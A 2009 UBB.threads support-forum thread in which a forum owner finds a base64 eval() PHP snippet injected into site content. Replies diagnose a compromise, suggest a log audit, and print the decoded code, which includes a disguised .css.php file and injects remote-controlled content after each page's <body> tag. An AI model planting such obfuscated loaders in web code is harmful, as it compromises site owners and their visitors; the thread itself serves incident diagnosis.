Community Introduction Body- hacked??

Print Thread

Hop To

#229235 09/15/2009 1:30 PM

Joined: Jun 2006

Posts: 197

California

ehm1

enthusiast

ehm1

enthusiast

Joined: Jun 2006

Posts: 197

California

I have this lines on my "Community Introduction Body" on version 7.3.1

Is that 'normal' or someone else put it there?

Thank you

-------------

Code

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9pbWlnY29tL3B1YmxpY19odG1sL2VudmlhTWFpbC9hZG1pbi9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2ltaWdjb20vcHVibGljX2h0bWwvZW52aWFNYWlsL2FkbWluL0ZDS2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

----

Re: Community Introduction Body- hacked?? ehm1 #229236 09/15/2009 1:31 PM
Joined: Jun 2006 Posts: 9,242 Likes: 1 Aberdeen, WA R Rick Former Developer
Rick Former Developer R Joined: Jun 2006 Posts: 9,242 Likes: 1 Aberdeen, WA	I'd say that's related to your other issue. It looks to me like you've got a hacker issue. Seems they put it into your community intro, and also into your header template.

Re: Community Introduction Body- hacked?? Rick #229237 09/15/2009 1:34 PM
Joined: Jun 2006 Posts: 9,242 Likes: 1 Aberdeen, WA R Rick Former Developer
Rick Former Developer R Joined: Jun 2006 Posts: 9,242 Likes: 1 Aberdeen, WA	I'd go through the normal cleanup and audit process at this point. You'd want to check all of your logs for any abnormal activity to try and track down how they are editing those files. A good place to start is by grabbing the time that one of the hacked files was actually edited, and then scanning your webserver logs for that same time. You should be able to track down if it's a web-based exploit with that method. If you don't see any matches there, then you can do the same thing with your FTP and domain CP logs. Last edited by Rick; 09/15/2009 1:39 PM.

Re: Community Introduction Body- hacked?? Rick #229242 09/15/2009 1:49 PM
Joined: Jun 2006 Posts: 197 California E ehm1 enthusiast
ehm1 enthusiast E Joined: Jun 2006 Posts: 197 California	Thank you Rick. I start doing that now.

Re: Community Introduction Body- hacked??

ehm1 #229246 09/15/2009 3:55 PM

Joined: Jun 2006

Posts: 16,299

Likes: 116

Portland, OR; USA

Gizmo

Gizmo

Joined: Jun 2006

Posts: 16,299

Likes: 116

Portland, OR; USA

Just FYI, that decoded (and cleaned) is:

Code

if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
	$GLOBALS['sh_no']=1;

	if(file_exists('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')) {
		include_once('/home/imigcom/public_html/enviaMail/admin/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');

		if(function_exists('gml') && !function_exists('dgobh')) {
			if(!function_exists('gzdecode')) {
				function gzdecode($R20FD65E9C7406034FADC682F06732868) {
					$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
					$R60169CD1C47B7A7A85AB44F884635E41=10;
					$R0D54236DA20594EC13FC81B209733931=0;

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
						$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
						$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
						$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
						$R60169CD1C47B7A7A85AB44F884635E41+=2;
					}

					$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));

					if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE) {
						$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
					}

					return $RC4A5B5E310ED4C323E04D72AFAE39F53;
				}
			}

			function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
				Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);

				if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
					return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
				} else {
					return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
				}
			}
			ob_start('dgobh');
		}
	}
}

So you may need to go in and do some cleanup on your site since it looks like they made a few new files...

I'd like to note that the majority of that code relies on the gzdecode function, which isn't added until PHP6... I have a hard enough time trying to find a host that supports PHP5 lol...

A quick google search (trying to figure out what the global var does) came up with a lot of similar hack posts on various forums (search)

I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!

Link Copied to Clipboard

UBB.threads PHP Forum Software Community Forums UBB.threads 7 Version 7 Support Community Introduction Body- hacked??